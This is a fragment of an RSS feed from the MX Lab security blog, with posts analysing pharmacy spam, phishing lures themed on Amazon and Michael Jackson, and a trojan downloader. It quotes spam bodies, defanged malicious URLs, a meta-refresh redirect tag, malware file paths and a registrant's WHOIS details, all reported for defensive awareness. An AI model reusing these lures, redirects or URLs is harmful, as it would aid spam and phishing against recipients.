<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/773/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/773/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/773/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/773/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/773/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/773/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/773/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/773/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/773/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/773/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=773&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/03/06/web-site-creator-hosts-are-being-abused-in-spam-campaigns/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>Spam campaign from Canadian Pharmacy also contains web based threats</title>
		<link>http://blog.mxlab.eu/2010/02/15/spam-campaign-from-canadian-pharmacy-also-contains-web-based-threats/</link>
		<comments>http://blog.mxlab.eu/2010/02/15/spam-campaign-from-canadian-pharmacy-also-contains-web-based-threats/#comments</comments>
		<pubDate>Mon, 15 Feb 2010 09:46:25 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Viruses]]></category>
		<category><![CDATA[canadian pharmacy]]></category>
		<category><![CDATA[HTML exploits]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=766</guid>
		<description><![CDATA[MX Lab detected several email based threats in a spam campaign from Canadian Pharmacy masked as an order confirmation of Amazon. The campaign comes from the spoofed email address Customer Support &#60;***.***@service.amazon.com&#62; and has the possible following subjects (*** numbers will vary): Confirm #*** Confirmation Order #*** Notice #*** Notify #*** Notification #*** Order Confirmation [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=766&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab detected several email based threats in a spam campaign from Canadian Pharmacy masked as an order confirmation of Amazon.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" alt="" width="450" height="418" /></p>
<p>The campaign comes from the spoofed email address Customer Support &lt;***.***@service.amazon.com&gt; and has the possible following subjects (*** numbers will vary):</p>
<p>Confirm #***<br />
Confirmation Order #***<br />
Notice #***<br />
Notify #***<br />
Notification #***<br />
Order Confirmation #***<br />
Order Notice #***<br />
Order Notify #***<br />
Order Notification #***</p>
<p>The body of the email:</p>
<blockquote><p>Your Order S\n:10444064511 Accepted.<br />
Details hxxp://www.klaudiusz.ramtel.pl/afrikaners.html</p>
<p>Thank you.<br />
Amazon.com Customer Support</p></blockquote>
<p>The campaign is detected yesterday but today we found a few threaths when following the included URLs. One threat was named HTML:iFrame-LZ[Trj] (Avast).</p>
<p>HTML:iFrame-LZ[Trj] is a malicious HTML script that may be downloaded unknowingly by a user when visiting malicious Web sites. The script will make connection to sites to download file(s). As a result, malicious routines of the downloaded files are exhibited on the affected system.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/766/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/766/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/766/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/766/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/766/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/766/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/766/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/766/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/766/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/766/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=766&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/02/15/spam-campaign-from-canadian-pharmacy-also-contains-web-based-threats/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" medium="image" />
	</item>
		<item>
		<title>Twitter accounts abused by spammers</title>
		<link>http://blog.mxlab.eu/2009/11/18/twitter-accounts-abused-by-spammers/</link>
		<comments>http://blog.mxlab.eu/2009/11/18/twitter-accounts-abused-by-spammers/#comments</comments>
		<pubDate>Wed, 18 Nov 2009 11:27:18 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[online pharmacy]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[Twitter spam]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=687</guid>
		<description><![CDATA[MX Lab detected a spam campaign where Twitter is being abused by spammers to promote online drug stores. The campaign is sent from random spoofed email addresses and has similar subjects like: 7U1 An amazing selection of brand name medications, all for incredibly low prices! 2F9 Looking for Hytrin? 7N8 6W3 Looking for Abilify? 5Z2 [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=687&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab detected a spam campaign where Twitter is being abused by spammers to promote online drug stores.</p>
<p>The campaign is sent from random spoofed email addresses and has similar subjects like:</p>
<blockquote><p>7U1 An amazing selection of brand name medications, all for incredibly low prices!<br />
2F9 Looking for Hytrin? 7N8<br />
6W3 Looking for Abilify?<br />
5Z2 Looking for Fosamax?<br />
4G5 Do you suffer from male impotence? Order Viagra online today 8I7<br />
5Y5 Do you have a urinary blockage?</p></blockquote>
<p>Some samples of the body:</p>
<blockquote><p>hxxp://twitter.com/oscaresquire/status/5804523982</p>
<p>All Medications are Always 100% Safe  Legal<br />
Our store is Verified, Trusted  Licensed<br />
Guaranteed LowPrices &#8211; up to 85% Off</p>
<p>! G6Y3</p>
<p>* P h 3nt_ er mI.ne 37.5<br />
* S0 .m@<br />
* X@ /\/ a .X<br />
* R1 .T@ L in<br />
* C 0 d1n3<br />
* V /\ L 1Um<br />
* KL 0 N_0.p in<br />
* AMB1en<br />
* Ci..@ _Lis<br />
* V| @ g.R @</p>
<p>www.twitter.com/dweepadvani/status/5790731913<br />
This message was sent to 96190</p></blockquote>
<p>And another one</p>
<blockquote><p>site that pharmacies and big companies don&#8217;t want you to know about!<br />
Vicodin ES Online, Hyrdrocodone, Lortab&#8230;</p>
<p>hxxp://twitter.com/itaiba/status/5803131461</p></blockquote>
<p>They all have the URL in common that points to a Twitter account. The format is  http://twitter.com/***/status/*** where *** stands for random characters.</p>
<p>Some examples of such an Twitter account that directs you to the online pharmacy.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20091118_twitter_spam.jpg" alt="" width="450" height="254" /></p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20091118_twitter_spam3.jpg" alt="" width="450" height="261" /></p>
<p>The med4udirect.com shop looks like this:</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20091118_twitter_spam2.jpg" alt="" width="450" height="361" /></p>
<p>The domain appears to registered in China.</p>
<pre> DomainName : MEDS4UDIRECT.COM

RSP: China Springboard Inc.
URL: http://www.namerich.cn      

Name Server :NS3.BERTOSNS.COM
Name Server :NS5.LOVELYSNB34.COM
Name Server :NS1.HDNSSTUFF.COM
Name Server :NS6.LOVELYSNB34.COM
Name Server :NS2.HDNSSTUFF.COM
Name Server :NS4.BERTOSNS.COM
Status :clientTransferProhibited
Status :clientDeleteProhibited
Creation  Date :2009-09-26
Expiration Date :2010-09-26
Last Update  Date :2009-11-11

Registrant ID :V-X-63521-21717
Registrant Name :LU TAO
Registrant Organization :LU TAO
Registrant Address :JIEFANGLU251
Registrant City :ShangHai
Registrant Province/State :ShangHai
Registrant Country Code :CN
Registrant Postal Code :200126
Registrant Phone Number :+86.0217415426
Registrant Fax :+86.0217415426
Registrant Email :djsnhe@163.com

Administrative ID :V-X-63521-21717
Administrative Name :LU TAO
Administrative Organization :LU TAO
Administrative Address :JIEFANGLU251
Administrative City :ShangHai
Administrative Province/State :ShangHai
Administrative Country Code :CN
Administrative Postal Code :200126
Administrative Phone Number :+86.0217415426
Administrative Fax :+86.0217415426
Administrative Email :djsnhe@163.com

Billing ID :V-X-63521-21717
Billing Name :LU TAO
Billing Organization :LU TAO
Billing Address :JIEFANGLU251
Billing City :ShangHai
Billing Province/State :ShangHai
Billing Country Code :CN
Billing Postal Code :200126
Billing Phone Number :+86.0217415426
Billing Fax :+86.0217415426
Billing Email :djsnhe@163.com

Technical ID :V-X-63521-21717
Technical Name :LU TAO
Technical Organization :LU TAO
Technical Address :JIEFANGLU251
Technical City :ShangHai
Technical Province/State :ShangHai
Technical Country Code :CN
Technical Postal Code :200126
Technical Phone Number :+86.0217415426
Technical Fax :+86.0217415426
Technical Email :djsnhe@163.com
</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/687/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/687/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/687/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/687/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/687/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/687/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/687/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/687/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/687/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/687/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=687&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2009/11/18/twitter-accounts-abused-by-spammers/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20091118_twitter_spam.jpg" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20091118_twitter_spam3.jpg" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20091118_twitter_spam2.jpg" medium="image" />
	</item>
		<item>
		<title>Can a spammer be creative?</title>
		<link>http://blog.mxlab.eu/2009/10/05/can-a-spammer-be-creative/</link>
		<comments>http://blog.mxlab.eu/2009/10/05/can-a-spammer-be-creative/#comments</comments>
		<pubDate>Mon, 05 Oct 2009 19:31:48 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=555</guid>
		<description><![CDATA[Yes, that is the answer we have today. MX Lab detected a nice piece of spam and we didn&#8217;t wanted to hold this one back for you. It&#8217;s not image based, no ASCII art but the text is constructed and formatted by the character &#8220;#&#8221;. It didn&#8217;t render well in Entourage on Mac so it [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=555&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>Yes, that is the answer we have today. MX Lab detected a nice piece of spam and we didn&#8217;t wanted to hold this one back for you.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20091005_spam_art.jpg" alt="" width="450" height="195" /></p>
<p>It&#8217;s not image based, no ASCII art but the text is constructed and formatted by the character &#8220;#&#8221;. It didn&#8217;t render well in Entourage on Mac so it needs a little work. <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/555/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/555/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/555/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/555/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/555/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/555/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/555/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/555/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/555/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/555/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=555&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2009/10/05/can-a-spammer-be-creative/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20091005_spam_art.jpg" medium="image" />
	</item>
		<item>
		<title>Death of Michael Jackson inspires spammers and malware distributors</title>
		<link>http://blog.mxlab.eu/2009/06/27/death-of-michael-jackson-inspires-spammers-and-malware-distributors/</link>
		<comments>http://blog.mxlab.eu/2009/06/27/death-of-michael-jackson-inspires-spammers-and-malware-distributors/#comments</comments>
		<pubDate>Sat, 27 Jun 2009 20:48:25 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[Viruses]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Michael Jackson]]></category>
		<category><![CDATA[trojans]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=492</guid>
		<description><![CDATA[Spammers and malware distributors are trying to take advantage of the death of Michael Jackson by sending out email campaigns with subject and/or body related to Michael Jackson while malware distributors try to infect computers by offering a URL to a site that offers a video of the death of the &#8220;King of pop&#8221;. Here [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=492&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>Spammers and malware distributors are trying to take advantage of the death of Michael Jackson by sending out email campaigns with subject and/or body related to Michael Jackson while malware distributors try to infect computers by offering a URL to a site that offers a video of the death of the &#8220;King of pop&#8221;. Here is a brief overview.</p>
<p><strong>Canadian Pharmacy spam</strong></p>
<p>One of the campaigns contains the subject &#8220;Michael Jackson dead? NO!!!&#8221; and the body content:</p>
<blockquote><p>Michael Jackson dead? NO!!!<br />
Open attached file and read!!!</p></blockquote>
<p>The attachment itself appears to be harmless and contains the HTML refresh tag</p>
<blockquote><p>&lt;meta http-equiv=&#8217;Refresh&#8217; content=&#8217;0; url=hxxp://addfamous.com/&#8217; /&gt;</p></blockquote>
<p>This will redirect your browser to the Canadian Pharmacy web site.</p>
<p><strong>Email harvesting</strong></p>
<p>Another campaign has the intention to harvest email addresses and is coming from a bogus email account but the reply to is a ***@live.com account. The email claims to have special and confidential information regarding the death of Michael Jackson. A sample of the content:</p>
<blockquote><p>Confidential<br />
Vital informations after the death of Michael Jackson’s I really need some one trusted &amp; secretive to speak with with informations i have in my possession before its too late Kindly reply me and i will immediately respond back,Its for just secret between both of us</p></blockquote>
<p>The call-to-action is to reply to this message. When doing so you will confirm the spammer that the email has been received and read and therefore is active.</p>
<p><strong>Malicious spam</strong></p>
<p>This spam email offers a link to a YouTube video but actually sends the recipient to a Trojan Downloader hosted on a compromised web site. The file is Michael.Jackson.videos.scr. When downloaded and executed 3 information-stealing components are downloaded and installed by the malware. One of the files has the name michael.gif and has a very low <a href="http://www.virustotal.com/analisis/67cba7b9d91e1cbcac0f22b5f4bcf12f4b07a1a62d7d3018e28ccd5ee93e0ce4-1246012313" target="_blank">AV detection rate</a>.</p>
<p>The malware then installs a malicious BHO that is registered with this file %windir%\Dynamic.dll. Another component is bound to startup at %windir%\system32\kproces.exe. Another malicious file installed by the malware is %windir%\system32\fotos.exe.</p>
<p>Upon executing the file, a legitimate Web site at http://musica.uol.com.br/ultnot/2009/06/25/michael-jackson.jhtm is opened by the default browser in order to distract the user by presenting a news article for them to read.</p>
<p>Virus Total <a href="http://www.virustotal.com/analisis/d602b5cbc6386e9ba4b7d910ff0eb04fefba5ce06ef6f703e37f76ab88ad2ff9-1246130240" target="_blank">permlink</a> and MD5: 664cb28ef710e35dc5b7539eb633abca.</p>
<p><strong>Student Loans</strong></p>
<p>A spam with the subject and the body content &#8220;Micheal Jackson History&#8221;, notice the wrong spelling of his firstname, leads to hxxp://loansofworld.blogspot.com/. This message was sent through Google Groups.</p>
<p><strong>Contact databases</strong></p>
<p>An email with the subject &#8220;Michael Jackson: last farewell from DataForYou&#8221; is attracting readers with a subject related to Michael Jackson but instead offers contact databases.</p>
<p>Notice the TinyURL inside the email content to hide a direct link to the web site. TinyURL has already removed the URL but  this example shows that you need to be carefull with URLs in emails where a service like TinyURL is shortening the full URL. Try to use a preview feature first when you don&#8217;t trust the source is our recommendation.</p>
<blockquote><p>Dear Sirs,<br />
in our site you have access, through the cheapest prices you have ever seen,<br />
to a vast database of international Companies,  divided by region, province, city or area of activity.</p>
<p>The databases are divided into two broad categories.</p>
<p>Archives of International Companies with E-mai only</p>
<p>The archives are divided by country and include a list of e-mail only.<br />
The archives are in TXT format and they are easy to be used  because<br />
this format is the  typical one used for data import. You can also find<br />
more than one email, relferring to different people working in the same<br />
structure, for the Companies which have provided them.</p>
<p>International Archives of active domains with MX record only</p>
<p>The archives are divided by size and include a list of  domains only.<br />
The archives are in TXT format and they are easy to use because this<br />
format is the typical one used for data iimport. All the domains have<br />
an active MX record; this means that each domain is directly linked<br />
with working  email accounts.</p>
<p>Visit our site at<br />
hxxp://tinyurl.com/infinitemail</p>
<p>Don&#8217;t lose this incredible opportunity for increment your business.</p>
<p>InfiniteMail</p>
<p>Customer Care</p>
<p>If you no longer want to receive our email reply here:<br />
mailto:remove@mediasch0pping.com</p></blockquote>
<p><strong>National Survey Panel&#8217;s Gift Program</strong></p>
<blockquote><p>What killed Michael Jackson?</p>
<p>Press here:<br />
hxxp://totjebiok.com/tr.php?72928+*****@*****.com</p>
<p>Tell us. Then complete the program requirements for a FREE 7 album collection of MJ&#8217;s solo career.</p></blockquote>
<p>These guys are using the death of Michael Jackson to attract some people to fill in some information and in return you can receive his albums for free.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20090627_MJackson_1.jpg" alt="" width="450" height="293" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/492/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/492/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/492/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/492/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/492/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/492/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/492/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/492/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/492/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/492/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=492&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2009/06/27/death-of-michael-jackson-inspires-spammers-and-malware-distributors/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20090627_MJackson_1.jpg" medium="image" />
	</item>
		<item>
		<title>Health.com branding used in spam</title>
		<link>http://blog.mxlab.eu/2009/05/19/health-com-branding-used-in-spam/</link>
		<comments>http://blog.mxlab.eu/2009/05/19/health-com-branding-used-in-spam/#comments</comments>
		<pubDate>Tue, 19 May 2009 01:00:54 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[Health.com]]></category>
		<category><![CDATA[branding]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=458</guid>
		<description><![CDATA[A few days earlier we reported that the branding of Auslogics Software was being used in a spam campaign. We now noticed that Health.com has been subject of such abuse. MX Lab intercepted spam messages with a Health.com branding. The image below shows us a mailing template with the Health logo, an image for viagra [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=458&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>A few days earlier we reported that the branding of <a href="http://blog.mxlab.eu/2009/05/14/auslogics-software-logo-used-in-spam/">Auslogics Software was being used in a spam campaign</a>. We now noticed that Health.com has been subject of such abuse.</p>
<p>MX Lab intercepted spam messages with a Health.com branding. The image below shows us a mailing template with the Health logo, an image for viagra and other pills, along withlinks to Twitter, Facebook and YouTube, opt-out links, privacy policy and the address of Health.com.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20090519_spam_health_com.jpg" alt="" width="450" height="637" /></p>
<p>Spammer have replaced each of the links with hxxp://www.blackaringo.ru in this campaign that redirects to hxxp://newpharmshappy.com/. This site is from our best friends, who else, the Canadian Pharmacy.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/458/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/458/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/458/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/458/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/458/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/458/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/458/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/458/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/458/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/458/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=458&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2009/05/19/health-com-branding-used-in-spam/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20090519_spam_health_com.jpg" medium="image" />
	</item>
	</channel>
</rss>